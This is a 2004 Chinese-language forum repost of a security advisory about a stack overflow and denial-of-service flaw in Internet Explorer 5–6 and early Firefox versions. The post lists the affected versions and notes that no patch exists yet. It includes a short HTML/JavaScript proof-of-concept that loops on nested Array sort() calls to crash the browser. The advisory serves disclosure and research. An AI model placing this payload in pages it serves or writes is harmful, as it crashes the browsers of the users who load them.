LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 643|回复: 0

多个浏览器嵌套数组sort()循环栈溢出漏洞

[复制链接]
发表于 2004-11-27 15:47:28 | 显示全部楼层 |阅读模式
多个浏览器嵌套数组sort()循环栈溢出漏洞

发布日期:2004-11-23
更新日期:2004-11-26

受影响系统:

    Microsoft Internet Explorer 6.0SP2
    Microsoft Internet Explorer 6.0SP1
    Microsoft Internet Explorer 5.5SP2
    Microsoft Internet Explorer 5.5SP1
    Microsoft Internet Explorer 5.5
    Microsoft Internet Explorer 5.0.1SP4
    Microsoft Internet Explorer 5.0.1SP3
    Microsoft Internet Explorer 5.0.1SP2
    Microsoft Internet Explorer 5.0.1SP1
    Mozilla Firefox 1.0
    Mozilla Firefox 0.9.3
    Mozilla Firefox 0.9.2
    Mozilla Firefox 0.9.1
    Mozilla Firefox 0.10.1
    Mozilla Firefox 0.10
    Microsoft Internet Explorer 6.0
        - Microsoft Windows XP Professional SP1
        - Microsoft Windows XP Professional
        - Microsoft Windows XP Home SP1
        - Microsoft Windows XP Home
        - Microsoft Windows NT 4.0 SP6a
        - Microsoft Windows ME
        - Microsoft Windows 98 SE
        - Microsoft Windows 98
        - Microsoft Windows 2003 Web Edition
        - Microsoft Windows 2003 Standard Edition
        - Microsoft Windows 2003 Enterprise Edition 64-bit
        - Microsoft Windows 2003 Enterprise Edition
        - Microsoft Windows 2003 Datacenter Edition 64-bit
        - Microsoft Windows 2003 Datacenter Edition
        - Microsoft Windows 2000

描述:FIREFOX和MS Internet Explorer是流行的浏览器软件。

FIREFOX和MS Internet Explorer在处理嵌套的数组时存在问题,远程攻击者可以利用这个漏洞对浏览器进行缓冲区溢出和拒绝服务攻击。

攻击者构建如下的包含恶意嵌套的数组sort()循环的网页,当FireFox和MS IE处理的时候可导致浏览器崩溃,发生基于栈的缓冲区溢出。

<*来源:Berend-Jan Wever (skylined@edup.tudelft.nl)
  
  链接:http://marc.theaimsgroup.com/?l= ... 40231124296&w=2
        http://marc.theaimsgroup.com/?l= ... 40118102746&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Berend-Jan Wever (skylined@edup.tudelft.nl)提供了如下测试方法:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

建议:厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表